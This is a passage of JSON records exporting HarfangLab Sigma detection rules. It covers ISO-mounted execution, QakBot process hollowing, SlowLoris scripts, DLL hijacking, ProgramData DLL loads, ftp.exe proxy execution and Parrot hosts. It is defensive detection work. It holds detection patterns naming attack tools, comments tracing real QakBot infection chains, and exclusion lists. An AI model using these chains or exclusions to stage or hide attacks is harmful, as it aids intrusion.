"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6f160ff-aaca-449a-ac1c-ad35b1e9d1c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622347Z",
"creation_date": "2026-03-23T11:45:34.622349Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622353Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
"https://attack.mitre.org/techniques/T1204/",
"https://attack.mitre.org/techniques/T1059/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1204_suspicious_execution_from_iso.yml",
"content": "title: Suspicious Execution from ISO File\nid: c6f160ff-aaca-449a-ac1c-ad35b1e9d1c5\ndescription: |\n Detects a suspicious execution from a mounted device.\n It is often the result of a spearphishing attack via disk image file (like ISO or IMG) containing malicious link.\n Attackers may abuse it to gain execution and to avoid detection.\n It is recommended to check the executed binary for malicious behavior or content.\nreferences:\n - https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\n - https://attack.mitre.org/techniques/T1204/\n - https://attack.mitre.org/techniques/T1059/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/02/14\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - attack.t1059\n - attack.defense_evasion\n - attack.t1218\n - attack.t1553.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: 'C:\\'\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\regsvr32.exe'\n - '\\mshta.exe'\n - '\\rundll32.exe'\n ParentImage: '?:\\Windows\\explorer.exe'\n # Malicious files are most of the time at the root of the disk image\n CurrentDirectory: '?:\\'\n\n # Detects binaries executed from the root of a disk image that are not signed\n selection_execution:\n CurrentDirectory: '?:\\'\n Signed: 'false'\n\n filter_depth:\n Image: '?:\\\\*\\\\*'\n\n # Avoid detection if the mounted device is related to a network drive\n filter_network:\n Image|startswith: '\\\\\\\\'\n\n filter_directory:\n CurrentDirectory:\n - 'C:\\'\n # Drive D are often use for CD-Rom drive\n - 'D:\\'\n\n exclusion_shell:\n CommandLine:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n\n exclusion_commandline:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\rundll32.exe cryptext.dll,CryptExtOpenCER '\n - '?:\\WINDOWS\\system32\\rundll32.exe cryptext.dll,CryptExtAddPFX '\n - '?:\\windows\\System32\\rundll32.exe ?:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll, ImageView_Fullscreen '\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files\\'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files (x86)\\'\n - '?:\\WINDOWS\\system32\\cmd.exe /c \\\\\\\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_device_harddiskvolume:\n Image|startswith: '\\Device\\HarddiskVolume'\n\n exclusion_ezdicom:\n - Image: '?:\\Launcher.exe'\n ProcessSha256: 'c450dd35228ca0e8d7d2d58add694d78a0403d4a3fadbfddbb0a01efa9899fc6'\n - Image:\n - '?:\\Ez-DicomCDViewer.exe'\n - '?:\\Ez-DicomCDViewer-??.exe'\n - '?:\\EzDicomCDViewerMPR.exe'\n\n exclusion_scanvisu:\n Image: '?:\\DEPART.EXE'\n Product: \"Lanceur de l'application SCANVISU (Scan+)\"\n\n exclusion_acetiam:\n Image: '?:\\CDStart.exe'\n Product: 'ACETIAM Viewer Lite'\n\n exclusion_etiam:\n Image: '?:\\START.EXE'\n Product: 'Start Etiam CD'\n\n exclusion_ondemand3d:\n Image: '?:\\CDViewer.exe'\n Product: 'OnDemand3DApp'\n\n condition: (selection or (selection_execution and not filter_depth and not filter_network)) and not filter_directory and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6f160ff-aaca-449a-ac1c-ad35b1e9d1c5",
"rule_name": "Suspicious Execution from ISO File",
"rule_description": "Detects a suspicious execution from a mounted device.\nIt is often the result of a spearphishing attack via disk image file (like ISO or IMG) containing malicious link.\nAttackers may abuse it to gain execution and to avoid detection.\nIt is recommended to check the executed binary for malicious behavior or content.\n",
"rule_creation_date": "2022-02-14",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1204",
"attack.t1218",
"attack.t1553.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6f424db-75c0-4673-be22-9ec4078db0a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077979Z",
"creation_date": "2026-03-23T11:45:34.077981Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077985Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
"https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
"https://binarydefense.com/qakbot-upgrades-to-stealthier-persistence-method/",
"https://www.elastic.co/fr/security-labs/qbot-malware-analysis",
"https://attack.mitre.org/techniques/T1055/012/"
],
"name": "t1055_012_quakbot_process_injection.yml",
"content": "title: Process Tampering Linked to QakBot Malware\nid: c6f424db-75c0-4673-be22-9ec4078db0a1\ndescription: |\n Detects a process injection technique called process hollowing, typically used by the QakBot malware.\n Attackers may inject malicious code into suspended and hollowed processes to evade detection.\n Process hollowing is a method of executing malicious code in the address space of a separate legitimate process.\n It is recommended to analyze both the parent and child processes to look for malicious content, and to investigate further suspicious activities on the host.\nreferences:\n - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n - https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\n - https://binarydefense.com/qakbot-upgrades-to-stealthier-persistence-method/\n - https://www.elastic.co/fr/security-labs/qbot-malware-analysis\n - https://attack.mitre.org/techniques/T1055/012/\ndate: 2022/04/08\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.Qakbot\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # Seen in March 2022 campaign :\n # C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE /dde --> regsvr32 C:\\Seng\\exle1.dll --> C:\\Windows\\SysWOW64\\OneDriveSetup.exe\n\n # Seen in April 2022 campaign :\n # C:\\Windows\\syswow64\\MsiExec.exe -Embedding 9B29D099C2FA9FBA0F9F92B45B8B5BB5 --> C:\\Windows\\SysWOW64\\regsvr32.exe C:\\Users\\xxx\\AppData\\Local\\SetupTest\\2.dll --> C:\\Windows\\SysWOW64\\OneDriveSetup.exe\n\n # Seen in July 2022 campaign :\n # ISO --> LNK --> C:\\Windows\\System32\\cmd.exe /q /c calc.exe (Dll Sideloading) --> C:\\Windows\\SysWOW64\\regsvr32.exe 7533.dll --> C:\\Windows\\SysWOW64\\wermgr.exe\n\n # Seen in November 2022 campaign :\n # https://twitter.com/pr0xylife/status/1592228104139067392\n # ISO --> LNK --> C:\\Windows\\System32\\cmd.exe /c control.exe (Dll Sideloading) --> C:\\Windows\\SysWOW64\\regsvr32.exe msoffice32.dll --> C:\\Windows\\SysWOW64\\CertEnrollCtrl.exe\n\n # Seen in December 2023 campaign:\n # https://twitter.com/CyberGoatherder/status/1736160938212901200\n # MsiExec.exe --> Rundll32.exe --> SearchIndexer.exe\n # https://twitter.com/Max_Mal_/status/1736392741758611607\n # MsiExec.exe --> Rundll32.exe --> wermgr.exe\n CommandLine|endswith:\n - '\\explorer.exe'\n - '\\iexplore.exe'\n - '\\OneDriveSetup.exe'\n - '\\msra.exe'\n - '\\mobsync.exe'\n - '\\wermgr.exe'\n - '\\CertEnrollCtrl.exe'\n - '\\SearchIndexer.exe'\n ParentImage|endswith:\n - '\\rundll32.exe'\n - '\\regsvr32.exe'\n\n # Specific for campaign with malicious document or msiexec\n selection_grandparent:\n GrandparentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\POWERPNT.EXE'\n - '\\msiexec.exe'\n\n # Specific for campaign with ISO --> LNK\n selection_currentdirectory:\n CurrentDirectory: '?:\\'\n\n exclusion_bluefiles:\n ParentCommandLine:\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc * BlueFilesSuite!BlueFilesSuite.CustomActions.RestartExplorerForce'\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc * BlueFilesSuite!BlueFilesSuite.CustomActions.RestartExplorer'\n\n # https://x.com/SBousseaden/status/1326652574150299649\n exclusion_runas:\n ParentCommandLine: '*RunDll32.exe ?:\\Windows\\System32\\SHELL32.dll,RunAsNewUser_RunDLL Local\\{4ddb9f3f-700c-4bd6-9fc0-eaf85c01d25b}*'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6f424db-75c0-4673-be22-9ec4078db0a1",
"rule_name": "Process Tampering Linked to QakBot Malware",
"rule_description": "Detects a process injection technique called process hollowing, typically used by the QakBot malware.\nAttackers may inject malicious code into suspended and hollowed processes to evade detection.\nProcess hollowing is a method of executing malicious code in the address space of a separate legitimate process.\nIt is recommended to analyze both the parent and child processes to look for malicious content, and to investigate further suspicious activities on the host.\n",
"rule_creation_date": "2022-04-08",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c701e4c7-e347-4278-a6b5-6caeac92ea57",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613703Z",
"creation_date": "2026-03-23T11:45:34.613706Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613713Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/",
"https://github.com/maxkrivich/SlowLoris",
"https://github.com/StanGirard/SlowLoris-DDOS-Attack",
"https://github.com/0xc0d/Slow-Loris",
"https://github.com/GHubgenius/slowloris.pl",
"https://attack.mitre.org/techniques/T1499/002/"
],
"name": "t1498_slowloris_script_execution_linux.yml",
"content": "title: SlowLoris Script Execution (Linux)\nid: c701e4c7-e347-4278-a6b5-6caeac92ea57\ndescription: |\n Detects suspicious arguments in a command-line linked to the usage of a SlowLoris DDoS script.\n SlowLoris is a type of DDoS attack which allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\n It is recommended to investigate this by checking if the script parameters are aimed at your own infrastructure and that they're not part of an internal test.\nreferences:\n - https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/\n - https://github.com/maxkrivich/SlowLoris\n - https://github.com/StanGirard/SlowLoris-DDOS-Attack\n - https://github.com/0xc0d/Slow-Loris\n - https://github.com/GHubgenius/slowloris.pl\n - https://attack.mitre.org/techniques/T1499/002/\ndate: 2023/09/19\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1499.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.SlowLoris\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - 'slowloris.pl'\n - 'slowloris '\n - 'slowloris.py'\n\n # There is another rule for cloning\n filter_github:\n CommandLine|contains|all:\n - ' clone '\n - 'github'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c701e4c7-e347-4278-a6b5-6caeac92ea57",
"rule_name": "SlowLoris Script Execution (Linux)",
"rule_description": "Detects suspicious arguments in a command-line linked to the usage of a SlowLoris DDoS script.\nSlowLoris is a type of DDoS attack which allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\nIt is recommended to investigate this by checking if the script parameters are aimed at your own infrastructure and that they're not part of an internal test.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2025-01-29",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1499.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c707a3c3-727b-4362-ab7f-c7e38a8e020d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088904Z",
"creation_date": "2026-03-23T11:45:34.088907Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088911Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_locationnotificationwindows.yml",
"content": "title: DLL Hijacking via LocationNotificationWindows.exe\nid: c707a3c3-727b-4362-ab7f-c7e38a8e020d\ndescription: |\n Detects potential Windows DLL Hijacking via LocationNotificationWindows.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LocationNotificationWindows.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\msvcp110_win.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c707a3c3-727b-4362-ab7f-c7e38a8e020d",
"rule_name": "DLL Hijacking via LocationNotificationWindows.exe",
"rule_description": "Detects potential Windows DLL Hijacking via LocationNotificationWindows.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c70add7d-5d2c-4c70-8093-25c9b2c4abc8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595326Z",
"creation_date": "2026-03-23T11:45:34.595329Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595337Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SecurityAura/status/1737092798728278498",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_dll_load_from_programdata.yml",
"content": "title: DLL Loaded from ProgramData Folder\nid: c70add7d-5d2c-4c70-8093-25c9b2c4abc8\ndescription: |\n Detects the loading of a DLL from the root of the ProgramData folder.\n This uncommon location may indicate malicious activity, as attackers often load unauthorized code here.\n It is recommended to analyze the loaded DLL, check its file integrity, and review process permissions to identify potential threats.\nreferences:\n - https://twitter.com/SecurityAura/status/1737092798728278498\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/01/26\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\ProgramData\\'\n\n filter_image:\n ImageLoaded: '?:\\ProgramData\\\\*\\\\*'\n\n exclusion_tencent:\n # C:\\Program Files (x86)\\Tencent\\QQLive\\QQLive.exe\n ProcessOriginalFileName: 'QQLive.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Tencent Technology(Shenzhen) Company Limited'\n ImageLoaded: '?:\\ProgramData\\QLDZModule.dll'\n\n exclusion_bomgar:\n OriginalFileName: 'nstvhook.dll'\n Description: 'Bomgar Support Client Utilities'\n ImageLoaded:\n - '?:\\ProgramData\\Z@S!-????????-????-????-????-????????????.tmp'\n - '?:\\ProgramData\\Z@!-????????-????-????-????-????????????.tmp'\n\n exclusion_quest:\n # C:\\Program Files (x86)\\Quest\\KACE\\Inventory.exe\n ProcessOriginalFileName: 'Inventory.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Quest Software Inc.'\n ImageLoaded: '?:\\ProgramData\\hooking64.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c70add7d-5d2c-4c70-8093-25c9b2c4abc8",
"rule_name": "DLL Loaded from ProgramData Folder",
"rule_description": "Detects the loading of a DLL from the root of the ProgramData folder.\nThis uncommon location may indicate malicious activity, as attackers often load unauthorized code here.\nIt is recommended to analyze the loaded DLL, check its file integrity, and review process permissions to identify potential threats.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c711a697-7c2d-432c-b9ec-5f5135728e32",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079297Z",
"creation_date": "2026-03-23T11:45:34.079299Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079303Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Ftp/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0095/"
],
"name": "t1218_suspicious_process_ftp.yml",
"content": "title: Suspicious ftp.exe Execution\nid: c711a697-7c2d-432c-b9ec-5f5135728e32\ndescription: |\n Detects a suspicious attempt to execute the legitimate ftp.exe binary in order to proxy the execution of another binary.\n Ftp.exe can be used as a LOLBin in order to the execute other malicious binaries and bypass existing application control defenses.\n It is recommended to analyze both the process responsible for the execution of ftp.exe and all processes stemming from ftp.exe for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Ftp/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0095/\ndate: 2021/08/05\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.command_and_control\n - attack.t1105\n - attack.s0095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.FTP\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_ftp:\n - Image:\n - '?:\\Windows\\System32\\ftp.exe'\n - '?:\\Windows\\SysWOW64\\ftp.exe'\n - OriginalFileName: 'ftp.exe'\n\n selection_proxy:\n CommandLine|contains: ' -s:'\n ParentCommandLine: '*echo*>* -s:*'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c711a697-7c2d-432c-b9ec-5f5135728e32",
"rule_name": "Suspicious ftp.exe Execution",
"rule_description": "Detects a suspicious attempt to execute the legitimate ftp.exe binary in order to proxy the execution of another binary.\nFtp.exe can be used as a LOLBin in order to the execute other malicious binaries and bypass existing application control defenses.\nIt is recommended to analyze both the process responsible for the execution of ftp.exe and all processes stemming from ftp.exe for malicious content or actions.\n",
"rule_creation_date": "2021-08-05",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c74354e5-97ed-497f-9053-69bd6dec5b1e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605373Z",
"creation_date": "2026-03-23T11:45:34.605377Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605384Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://parrotsec.org/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_silent_workstation_name_parrot.yml",
"content": "title: Activity linked to Workstation Named Parrot\nid: c74354e5-97ed-497f-9053-69bd6dec5b1e\ndescription: |\n Detects an activity from a machine whose name is Parrot, a widely used penetration testing Linux distribution.\n Attackers may connect external machines to the network to conduct malicious activities.\n It is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\nreferences:\n - https://parrotsec.org/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2020/01/14\nmodified: 2025/06/10\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Parrot\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n - Workstation: 'parrot'\n - WorkstationName: 'parrot'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c74354e5-97ed-497f-9053-69bd6dec5b1e",
"rule_name": "Activity linked to Workstation Named Parrot",
"rule_description": "Detects an activity from a machine whose name is Parrot, a widely used penetration testing Linux distribution.\nAttackers may connect external machines to the network to conduct malicious activities.\nIt is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\n",
"rule_creation_date": "2020-01-14",
"rule_modified_date": "2025-06-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c7469ee5-54c5-4538-ae5b-64928810d159",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
